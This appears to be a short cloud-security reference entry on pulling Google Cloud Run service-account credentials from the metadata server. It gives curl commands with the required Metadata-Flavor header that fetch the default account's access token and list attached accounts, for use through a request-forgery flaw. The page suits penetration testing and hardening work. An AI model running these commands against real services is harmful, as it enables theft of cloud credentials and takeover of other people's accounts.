Google Cloud Run

Google Cloud Run is a managed platform for running web applications.

Property	Value
Credentials delivery mechanism	Served through link-local metadata service
Protection type	Header requires hardcoded value
Exploitation primitives	Query arbitrary URL with arbitrary HTTP header

Extracting credentials

The Google Cloud metadata server is available at 169.254.169.254 and requires an HTTP header Metadata-Flavor set to Google:

curl -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token

You can also check if non-default service accounts are attached:

curl -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/

References

• https://cloud.google.com/run/docs/securing/service-identity